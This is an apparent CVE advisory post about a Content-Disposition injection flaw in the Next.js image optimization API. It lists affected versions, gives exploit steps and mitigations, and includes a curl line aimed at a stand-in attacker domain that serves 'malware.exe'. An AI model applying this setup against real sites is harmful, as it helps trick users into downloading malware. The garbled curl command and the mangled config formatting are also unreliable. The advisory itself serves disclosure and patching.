Nextjs, Content Injection, CVE-2025-41032 (Moderate)

By /

Listen to this Post

The CVE-2025-41032 vulnerability resides within the Next.js image optimization API. The component fails to properly validate and sanitize the `Content-Disposition` header from responses fetched from externally configured remote image sources. When an attacker controls such a source, they can craft a malicious HTTP response containing a `Content-Disposition` header with an `attachment` directive and a user-supplied `filename` parameter. Upon receiving this response, the Next.js server would inadvertently process it and forward the header to the end-user’s browser. This action triggers an automatic file download dialog for the user, presenting a file with the attacker-chosen name and content type. This mechanism allows for the delivery of arbitrary files, such as disguised executables or HTML pages containing phishing content, effectively exploiting the trusted domain of the Next.js application to lend credibility to the malicious download.
Platform: Next.js
Version: <15.4.5, <14.2.31
Vulnerability: Content Injection
Severity: Moderate

date: 2025-08-29

Prediction: 2025-09-05

What Undercode Say:

curl -H "Content-Disposition: attachment; filename='malware.exe'" http://attacker-controlled-domain.com/image.jpg`
<h2 style="color: blue;">// Next.js config (vulnerable)</h2>
<h2 style="color: blue;">module.exports = {</h2>
<h2 style="color: blue;"> images: {</h2>
<h2 style="color: blue;"> domains: [‘attacker-controlled-domain.com’],</h2>
<h2 style="color: blue;"> },</h2>
<h2 style="color: blue;">}</h2>
<h2 style="color: blue;">How Exploit:</h2>
Attacker hosts malicious image server. Server responds with crafted `Content-Disposition` header. Victim visits page loading the "image". Browser downloads malicious file with spoofed name.
<h2 style="color: blue;">Protection from this CVE:</h2>
Upgrade to v15.4.5 or v14.2.31. Strictly validate all entries in `images.domains` andimages.remotePatterns`. Implement a Content Security Policy (CSP).

Impact:

Phishing attacks, malicious file delivery, client-side code execution, reputation damage.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top